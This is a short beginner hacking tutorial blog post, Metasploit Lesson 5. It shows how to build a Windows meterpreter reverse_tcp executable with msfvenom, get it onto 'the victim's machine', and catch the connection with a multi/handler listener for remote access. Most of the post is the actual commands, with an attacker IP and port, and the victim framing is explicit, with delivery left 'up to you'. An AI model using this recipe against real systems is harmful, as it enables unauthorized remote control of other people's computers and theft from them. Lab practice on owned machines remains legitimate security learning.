Hacking Tutorial Beginner to advanced - Metasploit (Lesson 5) - Payload

PAYLOAD

Metasploit Framework

Today we are looking at an advanced and useful realtime stuff Payload.
A payload is very much similar to a virus.Payload is a set of codes designed to hack a device.

So that's it NO MORE THEORY , LET'S DO SOME PRACTICAL!!!

Hack a windows 10 system using payload

STEP -1 Creating a payload 

  • Open terminal in kali linux and type the following command
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.192.0.107 LPORT=4444 -f exe -o Desktop/virus/test1.exe
Creating payload for windows

Here LHOST is the local host IP means IP of our kali machine.(it can be obtained by typing 'ifconfig' in terminal
ifconfig
  • STEP-2 Placing the payload in the victim's System

my desktop
payload
A file named test1.exe is saved to my Desktop/virus Folder . This file is our Payload, now put this file in to the victim's machine. That's up to you......
payload in windows


Here I put the payload in to my windows PC. 

  • STEP-3 Accessing the target system
Open terminal in Kali and run the following command
>msfconsole


Open msfconsole
msfconsole

>use exploit/multi/handler
>set payload windows/meterpreter/reverse_tcp
>set lhost <your local ip>
>set lport 4444
exploitation using payload


>exploit






Now run the payload in victim's PC

NOW YOU CAN GET ACCESS TO THE TARGET SYSTEM.
To view the available options, Type 'help'